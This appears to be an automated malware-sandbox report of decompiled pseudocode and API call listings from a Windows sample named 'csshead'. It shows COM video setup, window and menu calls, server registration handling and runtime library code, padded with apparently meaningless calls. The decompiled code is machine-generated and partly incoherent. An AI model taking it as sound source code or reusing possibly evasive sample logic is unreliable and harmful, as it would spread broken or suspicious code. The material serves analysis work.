							_t187 =  *((intOrPtr*)( *((intOrPtr*)( *_t185))))(_t185, 0x433fdc,  &_a108);
							__eflags = _t187;
							if(_t187 < 0) {
								_t235 = _a12;
								 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 8))))(_t235);
								 *_t343();
							}
							_t188 = _a12;
							_t190 =  *((intOrPtr*)( *((intOrPtr*)( *_t188))))(_t188, 0x433fec,  &_a40);
							__eflags = _t190;
							if(_t190 < 0) {
								_t230 = _a84;
								 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 8))))(_t230);
								_t232 = _v4;
								 *((intOrPtr*)( *((intOrPtr*)( *_t232 + 8))))(_t232);
								 *_t343();
							}
							_t192 =  *_t352( &_a32, 0, 1, 0x43a4f8,  &_a80);
							__eflags = _t192;
							if(_t192 >= 0) {
								_t210 = _v20;
								_t211 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0xc))))(_t210, _a60, L"Push Source");
								__eflags = _t211;
								if(_t211 >= 0) {
									_t217 =  *_t352(0x43400c, 0, 1, 0x43a4f8,  &_v60);
									__eflags = _t217;
									if(_t217 >= 0) {
										_t218 = _v52;
										_t220 =  *((intOrPtr*)( *((intOrPtr*)( *_t218 + 0xc))))(_t218, _v80, L"Enhanced Video Renderer");
										__eflags = _t220;
										if(_t220 >= 0) {
											_t221 = _v64;
											 *((intOrPtr*)( *((intOrPtr*)( *_t221 + 0x30))))(_t221, 0);
											_t223 = _a12;
											_t224 =  *((intOrPtr*)( *((intOrPtr*)( *_t223 + 0x1c))))(_t223);
											__eflags = _t224;
											if(_t224 >= 0) {
												_t227 = _v48;
												 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 0x24))))(_t227, 0x2710,  &_v16);
											}
											_t225 = _a8;
											 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 0x24))))(_t225);
										}
									}
								}
								_t212 = _a48;
								__eflags = _t212;
								if(_t212 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t212 + 8))))(_t212);
								}
								_t213 = _v60;
								__eflags = _t213;
								if(_t213 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t213 + 8))))(_t213);
								}
							}
							_t193 = _a64;
							 *((intOrPtr*)( *((intOrPtr*)( *_t193 + 8))))(_t193);
							_t195 = _a4;
							 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 8))))(_t195);
							_t197 = _v28;
							 *((intOrPtr*)( *((intOrPtr*)( *_t197 + 8))))(_t197);
							 *0x4335b8();
							_t200 =  *0x442a98; // 0x0
							_t353 =  *0x442aa0; // 0x0
							_t201 = GetDlgItem(0, _t200);
							 *0x4335d0(0);
							_t360 =  *0x4335bc;
							 *_t360(_t353, 1, 0);
							 *0x4335c0(_t201, _t353);
							 *0x4335c4(GetTopWindow(0));
							 *_t360(_t353, 0, 1);
							__eflags =  *0x442aa0;
							if( *0x442aa0 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 8))))(_t353);
							}
							 *0x4335cc();
						}
						E00422840( &_a224, 0, 0x30);
						_t340 = _a108;
						_t362 = _t361 + 0xc;
						_a224.cbSize = 0x30;
						_a228 = 1;
						_a236 = 0;
						_t150 = SetMenuItemInfoA(_t256, _t340, 0,  &_a224);
						__eflags = _t150;
						if(_t150 != 0) {
							DrawMenuBar(0);
						} else {
							GetLastError();
						}
						E00422840( &_a224, 0, 0x30);
						_t363 = _t362 + 0xc;
						_a224.cbSize = 0x30;
						_a228 = 1;
						GetMenuItemInfoA(_t256, _t340, 0,  &_a224);
						_t348 =  *0x442aa8; // 0x0
						BeginPaint(_t348,  &_a348);
						EndPaint(_t348,  &_a348);
						_a348.hdc = 1;
						GetClientRect(_t348,  &_a356);
						EnumDateFormatsA(_a144, 0x400, 1);
						__eflags = _t256 -  *0x442aa4; // 0x0
						if(__eflags < 0) {
							 *0x442aac =  *((intOrPtr*)(_t363 + 0x3ac + _t256 * 4));
						}
						_t349 = _a16;
						__eflags = _t349;
						if(_t349 == 0) {
							L58:
							L00405200();
							E00405010(4, 5);
							 *0x4335c8();
							__eflags = _a131;
							if(__eflags == 0) {
								_push(_a2244);
								_push(_a2240);
								_t163 = L004198E0(_t256, __eflags);
								_t363 = _t363 + 8;
								_t350 = _t163;
							} else {
								_a220 = 0x435a4c;
								_a224.cbSize = 0;
								_a228 = 0;
								_a232 = 0;
								_a236 = 0;
								_a240 = 0;
								_a244 = 0;
								_t169 = L004050E0( &_a220);
								_t133 =  &_a220; // 0x435a4c
								_t350 = _t169;
								L00406820(_t133);
							}
							L004050A0(0x442ad8);
							_t165 =  *0x442b20; // 0x0
							Sleep(_t165);
						} else {
							while(1) {
								_t171 = lstrcmpiA(_t349, "UnregServer");
								__eflags = _t171;
								if(_t171 == 0) {
									break;
								}
								_t174 = lstrcmpiA(_t349, "RegServer");
								__eflags = _t174;
								if(_t174 == 0) {
									L0040F280(0x442ad8, 0x64, 1, 0);
									_t350 = L00409210(0x442ad8, 1, 0);
									L62:
									L004093B0(0x442ad8);
									 *0x4335b8();
									return _t350;
								}
								_t177 = lstrcmpiA(_t349, "Automation");
								__eflags = _t177;
								if(_t177 == 0) {
									L57:
									_a139 = 1;
									goto L58;
								}
								_t178 = lstrcmpiA(_t349, "Embedding");
								__eflags = _t178;
								if(_t178 == 0) {
									goto L57;
								}
								_t349 = E00403D10(_t349,  &_a208);
								_t363 = _t363 + 8;
								__eflags = _t349;
								if(_t349 != 0) {
									continue;
								}
								goto L58;
							}
							L0040F280(0x442ad8, 0x64, 0, 0);
							_t350 = L004092A0(0x442ad8, 1, 0);
						}
						goto L62;
					} else {
						_a56.left = 0;
						_a60 = 0;
						_a64 = 0;
						_a68 = 0;
						CreateRectRgnIndirect( &_a56);
						if(_a76 > 0xa) {
							goto L21;
						}
						if((0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7 >> 0x1f) + (0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7) <= 1) {
							 *0x442a94 = _a104;
						}
						WaitForSingleObject(_a108, 0xbb6);
						_t253 = _a176;
						_t345 = 0 - ( *0x442aa8 & 0x0000ffff) * _t356 + _t339;
						_t303 =  *0x442aa0; // 0x0
						if(_t303 - _a100 >= _t253) {
							_t251 =  *0x442aac; // 0x0
							 *0x442a94 = _t251 + _a28;
						}
						GetCursorPos( &_a192);
						_a76 = _a76 + 1;
						_t255 = 5;
						do {
							goto L4;
						} while (_t255 != 0);
						goto L7;
					}
					L4:
					 *0x442a98 =  *0x442a98 + DragQueryFileA(0, 0xffffffff,  &_a940, 0x104);
					_t258 =  *0x442aa0; // 0x0
					if(_t339 /  &(_t258[0x61]) * _t356 != 0) {
						_t301 =  *0x442aa4; // 0x0
						asm("cdq");
						_t339 = (_t345 & 0x0000ffff) / (_t301 + 0x44);
					}
					_t255 = _t255 - 1;
				}
			}

0x0041d5c9
0x0041d5c9
0x0041d5c9
0x0041d5c9
0x0041d5d0
0x0041d5d0
0x0041d5e7
0x0041d5ed
0x0041d601
0x0041d603
0x0041d60c
0x0041d612
0x0041d612
0x0041d614
0x0041d615
0x00000000
0x00000000
0x0041d617
0x0041d617
0x0041d61e
0x0041d629
0x0041d631
0x0041d638
0x0041d63c
0x0041d63c
0x0041d648
0x0041d65e
0x0041d65e
0x0041d65e
0x0041d64a
0x0041d651
0x0041d651
0x0041d665
0x0041d66e
0x0041d670
0x0041d678
0x0041d679
0x0041d67b
0x0041d67b
0x0041d683
0x0041d70f
0x0041d718
0x0041d745
0x0041d74b
0x0041d751
0x0041d759
0x0041d764
0x0041d768
0x0041d76f
0x0041d773
0x0041d77a
0x0041d77e
0x0041d784
0x0041d79c
0x0041d79e
0x0041d7a4
0x0041d7a6
0x0041d7a8
0x0041d7a8
0x0041d7aa
0x0041d7c0
0x0041d7c2
0x0041d7c4
0x0041d7c6
0x0041d7d0
0x0041d7d2
0x0041d7d2
0x0041d7d4
0x0041d7e7
0x0041d7e9
0x0041d7eb
0x0041d7ed
0x0041d7fa
0x0041d7fc
0x0041d806
0x0041d808
0x0041d808
0x0041d81f
0x0041d821
0x0041d823
0x0041d829
0x0041d840
0x0041d842
0x0041d844
0x0041d85c
0x0041d85e
0x0041d860
0x0041d862
0x0041d876
0x0041d878
0x0041d87a
0x0041d87c
0x0041d887
0x0041d889
0x0041d896
0x0041d898
0x0041d89a
0x0041d89c
0x0041d8b0
0x0041d8b0
0x0041d8b2
0x0041d8bf
0x0041d8bf
0x0041d87a
0x0041d860
0x0041d8c1
0x0041d8c8
0x0041d8ca
0x0041d8d2
0x0041d8d2
0x0041d8d4
0x0041d8d8
0x0041d8da
0x0041d8e2
0x0041d8e2
0x0041d8da
0x0041d8e4
0x0041d8f1
0x0041d8f3
0x0041d8fd
0x0041d8ff
0x0041d909
0x0041d90b
0x0041d911
0x0041d916
0x0041d91f
0x0041d929
0x0041d92f
0x0041d93a
0x0041d93e
0x0041d94d
0x0041d958
0x0041d95a
0x0041d961
0x0041d969
0x0041d969
0x0041d96b
0x0041d96b
0x0041d982
0x0041d987
0x0041d98b
0x0041d999
0x0041d9a0
0x0041d9ab
0x0041d9b2
0x0041d9b8
0x0041d9ba
0x0041d9c5
0x0041d9bc
0x0041d9bc
0x0041d9bc
0x0041d9d5
0x0041d9da
0x0041d9e8
0x0041d9ef
0x0041d9fa
0x0041da00
0x0041da0f
0x0041da1e
0x0041da2d
0x0041da38
0x0041da4d
0x0041da53
0x0041da59
0x0041da62
0x0041da62
0x0041da68
0x0041da6c
0x0041da6e
0x0041db16
0x0041db1b
0x0041db29
0x0041db2e
0x0041db34
0x0041db3c
0x0041db9d
0x0041db9e
0x0041db9f
0x0041dba4
0x0041dba7
0x0041db3e
0x0041db45
0x0041db50
0x0041db57
0x0041db5e
0x0041db65
0x0041db6c
0x0041db73
0x0041db7a
0x0041db7f
0x0041db86
0x0041db88
0x0041db88
0x0041dbae
0x0041dbb3
0x0041dbb9
0x0041da74
0x0041da80
0x0041da86
0x0041da88
0x0041da8a
0x00000000
0x00000000
0x0041da92
0x0041da94
0x0041da96
0x0041daf5
0x0041db07
0x0041dbbf
0x0041dbc4
0x0041dbc9
0x0041dbdb
0x0041dbdb
0x0041da9e
0x0041daa0
0x0041daa2
0x0041db0e
0x0041db0e
0x00000000
0x0041db0e
0x0041daaa
0x0041daac
0x0041daae
0x00000000
0x00000000
0x0041dabe
0x0041dac0
0x0041dac3
0x0041dac5
0x00000000
0x00000000
0x00000000
0x0041dac7
0x0041dad2
0x0041dae4
0x0041dae4
0x00000000
0x0041d694
0x0041d69b
0x0041d6a3
0x0041d6a7
0x0041d6ab
0x0041d6af
0x0041d6ba
0x00000000
0x00000000
0x0041d6d7
0x0041d6dd
0x0041d6dd
0x0041d6ed
0x0041d6fa
0x0041d708
0x0041d590
0x0041d5a0
0x0041d5a2
0x0041d5ab
0x0041d5ab
0x0041d5b8
0x0041d5be
0x0041d5c2
0x0041d5d0
0x00000000
0x00000000
0x00000000
0x0041d5d0
0x0041d5d0
0x0041d5e7
0x0041d5ed
0x0041d601
0x0041d603
0x0041d60c
0x0041d612
0x0041d612
0x0041d614
0x0041d614

APIs

Part of subcall function 0040F280: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F2F6
Part of subcall function 0040F280: lstrlenA.KERNEL32(?), ref: 0040F33C
Part of subcall function 0040F280: GetModuleHandleA.KERNEL32(00000000,?,00000003,?), ref: 0040F3DB
Part of subcall function 0040F280: lstrlenW.KERNEL32(?,?,?,?,?,00000003,?), ref: 0040F443

Part of subcall function 00405200: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040520C
Part of subcall function 00405200: CloseHandle.KERNEL32(00000000), ref: 0040524A

Part of subcall function 00405010: CoRegisterClassObject.OLE32(?,?,?,?,?), ref: 00405062

Part of subcall function 004198E0: EnterCriticalSection.KERNEL32 ref: 0041991C
Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
Part of subcall function 004198E0: LeaveCriticalSection.KERNEL32(-00000010,-00000010,-00000010), ref: 00419942
Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA

Part of subcall function 004050A0: CoRevokeClassObject.OLE32(?), ref: 004050C1

GetCursorPos.USER32(?), ref: 0041D5B8
DragQueryFileA.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
GetNumberOfPhysicalMonitorsFromHMONITOR.DXVA2(00000000,?), ref: 0041D67B
CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
CoInitializeEx.OLE32(00000000,00000002), ref: 0041D77E
CoCreateInstance.OLE32(00433FFC,00000000,00000001,0043A508,?), ref: 0041D79C
CoUninitialize.OLE32 ref: 0041D7A8
CoUninitialize.OLE32 ref: 0041D7D2
CoUninitialize.OLE32 ref: 0041D808
CoCreateInstance.OLE32(?,00000000,00000001,0043A4F8,00000000), ref: 0041D81F
CoCreateInstance.OLE32(0043400C,00000000,00000001,0043A4F8,?), ref: 0041D85C
CoUninitialize.OLE32 ref: 0041D90B
GetDlgItem.USER32(00000000,00000000), ref: 0041D91F
OleInitialize.OLE32(00000000), ref: 0041D929
CoLockObjectExternal.OLE32(00000000,00000001,00000000), ref: 0041D93A
RegisterDragDrop.OLE32(00000000,00000000), ref: 0041D93E
GetTopWindow.USER32(00000000), ref: 0041D946
RevokeDragDrop.OLE32(00000000), ref: 0041D94D
CoLockObjectExternal.OLE32(00000000,00000000,00000001), ref: 0041D958
OleUninitialize.OLE32 ref: 0041D96B
SetMenuItemInfoA.USER32 ref: 0041D9B2
GetLastError.KERNEL32 ref: 0041D9BC
DrawMenuBar.USER32(00000000), ref: 0041D9C5
GetMenuItemInfoA.USER32 ref: 0041D9FA
BeginPaint.USER32(00000000,?), ref: 0041DA0F
EndPaint.USER32(00000000,?), ref: 0041DA1E
GetClientRect.USER32 ref: 0041DA38
EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
lstrcmpiA.KERNEL32(?,UnregServer), ref: 0041DA86
lstrcmpiA.KERNEL32(?,RegServer), ref: 0041DA92
lstrcmpiA.KERNEL32(?,Automation), ref: 0041DA9E
lstrcmpiA.KERNEL32(?,Embedding), ref: 0041DAAA

Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D3B
Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D42
Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D51

CoResumeClassObjects.OLE32 ref: 0041DB2E
Sleep.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0041DBB9

Part of subcall function 004093B0: CloseHandle.KERNEL32(?), ref: 004093BC

CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBC9

Part of subcall function 004050E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004050FD
Part of subcall function 004050E0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040511F
Part of subcall function 004050E0: TranslateMessage.USER32(?), ref: 0040513C
Part of subcall function 004050E0: DispatchMessageA.USER32(?), ref: 00405143

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00418760, Relevance: 7.6, APIs: 5, Instructions: 75window

APIs

SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
GetWindowRect.USER32(?,?), ref: 004187C9
SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
GetWindowRect.USER32(?,?), ref: 00418823

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041F120, Relevance: 7.6, APIs: 5, Instructions: 65

APIs

RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041F120, Relevance: 7.6, APIs: 5, Instructions: 65

C-Code - Quality: 81%

			E0041F120(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _t8;
				intOrPtr _t16;
				intOrPtr _t20;
				intOrPtr* _t24;
				intOrPtr _t26;
				struct _CRITICAL_SECTION* _t27;
				void* _t32;
				intOrPtr* _t33;

				_t26 =  *0x442a30; // 0x0
				_t27 = _t26 + 0x10;
				_t32 = __ecx;
				EnterCriticalSection(_t27);
				_t1 = _t32 + 0x34; // 0x0
				_t33 =  *_t1;
				_t20 =  *((intOrPtr*)(_t33 + 8));
				_t8 = 0;
				if(_t20 <= 0) {
					L6:
					LeaveCriticalSection(_t27);
					return 0;
				} else {
					_t24 =  *_t33;
					_t16 = _a4;
					while( *_t24 != _t16) {
						_t8 = _t8 + 1;
						_t24 = _t24 + 4;
						if(_t8 < _t20) {
							continue;
						} else {
							LeaveCriticalSection(_t27);
							return 0;
						}
						goto L14;
					}
					if(_t8 != 0xffffffff) {
						if(_t8 < 0 || _t8 >= _t20) {
							RaiseException(0xc000008c, 1, 0, 0);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							if(( *0x442b58 & 0x00000001) == 0) {
								 *0x442b58 =  *0x442b58 | 0x00000001;
								 *0x441384 = 1;
								 *0x441378 = "ToolbarWindow32";
								 *0x44137c = 0;
								 *0x441380 = 0;
								 *0x441388 = 0;
								 *0x44138a = 0;
								 *0x44138b = 0;
								 *0x44138f = 0;
								 *0x441393 = 0;
								 *0x441397 = 0;
								 *0x44139b = 0;
								 *0x44139f = 0;
								 *0x4413a3 = 0;
								 *0x4413a7 = 0;
								 *0x4413ab = 0;
							}
							return 0x441348;
						} else {
							LeaveCriticalSection(_t27);
							return  *((intOrPtr*)( *((intOrPtr*)(_t33 + 4)) + _t8 * 4));
						}
					} else {
						goto L6;
					}
				}
				L14:
			}

0x0041f123
0x0041f129
0x0041f12d
0x0041f12f
0x0041f135
0x0041f135
0x0041f138
0x0041f13b
0x0041f13f
0x0041f169
0x0041f16c
0x0041f177
0x0041f141
0x0041f141
0x0041f143
0x0041f147
0x0041f14b
0x0041f14c
0x0041f151
0x00000000
0x0041f153
0x0041f156
0x0041f161
0x0041f161
0x00000000
0x0041f151
0x0041f167
0x0041f17c
0x0041f1a2
0x0041f1a8
0x0041f1a9
0x0041f1aa
0x0041f1ab
0x0041f1ac
0x0041f1ad
0x0041f1ae
0x0041f1af
0x0041f1bb
0x0041f1bd
0x0041f1c5
0x0041f1cd
0x0041f1d7
0x0041f1dc
0x0041f1e1
0x0041f1e8
0x0041f1ed
0x0041f1f2
0x0041f1f7
0x0041f1fc
0x0041f201
0x0041f206
0x0041f20b
0x0041f210
0x0041f215
0x0041f215
0x0041f21f
0x0041f182
0x0041f189
0x0041f194
0x0041f194
0x00000000
0x00000000
0x00000000
0x0041f167
0x00000000

APIs

EnterCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F12F
LeaveCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F156
LeaveCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F16C
LeaveCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F189
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?), ref: 0041F1A2

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00416430, Relevance: 7.6, APIs: 5, Instructions: 61string

APIs

GetClassNameA.USER32(?,00000007,00000007), ref: 0041645A
lstrcmp.KERNEL32(00436334,00000000), ref: 0041646A
GetClassNameA.USER32(?,00000007,00000007), ref: 0041649A
lstrcmp.KERNEL32(00436334,00000000), ref: 004164AA
CallNextHookEx.USER32(00442A54,?,?,?), ref: 004164D8

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00421F2E, Relevance: 7.6, APIs: 5, Instructions: 58

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C

Part of subcall function 00421E10: IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
Part of subcall function 00421E10: RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
Part of subcall function 00421E10: InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
Part of subcall function 00421E10: HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00401910, Relevance: 7.6, APIs: 5, Instructions: 55
string

C-Code - Quality: 100%

			E00401910(char* _a4, CHAR* _a8, int _a12) {
				char _v260;
				CHAR* _t9;
				int _t13;
				CHAR* _t14;
				CHAR* _t15;
				char* _t16;

				_t15 = _a8;
				_t14 = _t15;
				if(_t15 != 0) {
					_t13 = _a12;
				} else {
					_t14 =  &_v260;
					_t13 = 0x104;
				}
				_t16 = _a4;
				if(GetFileTitleA(_t16, _t14, _t13) == 0) {
					if(_t15 != 0) {
						goto L7;
					} else {
						return lstrlenA(_t14) + 1;
					}
				} else {
					_t9 = PathFindFileNameA(_t16);
					if(_t15 != 0) {
						lstrcpynA(_t15, _t9, _t13);
						L7:
						return 0;
					} else {
						return lstrlenA(_t9) + 1;
					}
				}
			}

0x00401919
0x00401921
0x00401925
0x00401932
0x00401927
0x00401927
0x0040192b
0x0040192b
0x00401939
0x0040194c
0x00401984
0x00000000
0x00401986
0x00401998
0x00401998
0x0040194e
0x0040194f
0x00401957
0x0040196f
0x00401978
0x00401981
0x00401959
0x0040196b
0x0040196b
0x00401957

APIs

GetFileTitleA.COMDLG32(?,?,?), ref: 00401943
PathFindFileNameA.SHLWAPI(?), ref: 0040194F
lstrlenA.KERNEL32(00000000), ref: 0040195A
lstrcpynA.KERNEL32(?,00000000,?), ref: 0040196F
lstrlenA.KERNEL32(?), ref: 00401987

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042D0C2, Relevance: 7.6, APIs: 5, Instructions: 54timethread

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0042D0F9
GetCurrentProcessId.KERNEL32 ref: 0042D105
GetCurrentThreadId.KERNEL32 ref: 0042D10D
GetTickCount.KERNEL32 ref: 0042D115
QueryPerformanceCounter.KERNEL32(?), ref: 0042D121

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00409330, Relevance: 7.6, APIs: 5, Instructions: 50
thread

C-Code - Quality: 100%

			E00409330(void* __ecx) {
				long _t3;
				void* _t5;
				intOrPtr _t8;
				struct _CRITICAL_SECTION* _t9;
				intOrPtr* _t11;
				void* _t12;
				intOrPtr* _t13;
				void* _t14;
				intOrPtr _t15;

				_t8 =  *0x442a30; // 0x0
				_t9 = _t8 + 0x10;
				_t14 = __ecx;
				EnterCriticalSection(_t9);
				_t3 = GetCurrentThreadId();
				_t11 =  *((intOrPtr*)(_t14 + 0x34));
				_t15 =  *((intOrPtr*)(_t11 + 8));
				_t12 = 0;
				if(_t15 <= 0) {
					L6:
					LeaveCriticalSection(_t9);
					return 0;
				} else {
					_t13 =  *_t11;
					while( *_t13 != _t3) {
						_t12 = _t12 + 1;
						_t13 = _t13 + 4;
						if(_t12 < _t15) {
							continue;
						} else {
							LeaveCriticalSection(_t9);
							return 0;
						}
						goto L8;
					}
					if(_t12 != 0xffffffff) {
						_t5 = L00411990(_t11, _t12);
						LeaveCriticalSection(_t9);
						return _t5;
					} else {
						goto L6;
					}
				}
				L8:
			}

0x00409331
0x00409339
0x0040933d
0x0040933f
0x00409345
0x0040934b
0x0040934e
0x00409351
0x00409355
0x00409380
0x00409383
0x0040938e
0x00409357
0x00409357
0x00409360
0x00409364
0x00409365
0x0040936a
0x00000000
0x0040936c
0x0040936f
0x0040937a
0x0040937a
0x00000000
0x0040936a
0x0040937e
0x00409390
0x00409398
0x004093a3
0x00000000
0x00000000
0x00000000
0x0040937e
0x00000000

APIs

EnterCriticalSection.KERNEL32(-00000010), ref: 0040933F
GetCurrentThreadId.KERNEL32 ref: 00409345
LeaveCriticalSection.KERNEL32(-00000010), ref: 0040936F
LeaveCriticalSection.KERNEL32(-00000010), ref: 00409383
LeaveCriticalSection.KERNEL32(-00000010,00000000), ref: 00409398

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042A52B, Relevance: 7.5, APIs: 5, Instructions: 49LIBRARYCODE

APIs

__CreateFrameInfo.LIBCMT ref: 0042A553

Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241B9
Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241C7

__getptd.LIBCMT ref: 0042A55D

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

__getptd.LIBCMT ref: 0042A56B
__getptd.LIBCMT ref: 0042A579
__getptd.LIBCMT ref: 0042A584

Part of subcall function 00424250: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042429C

Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A660
Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A66E

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00423C45, Relevance: 7.5, APIs: 5, Instructions: 47thread

APIs

Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A

Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3

Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

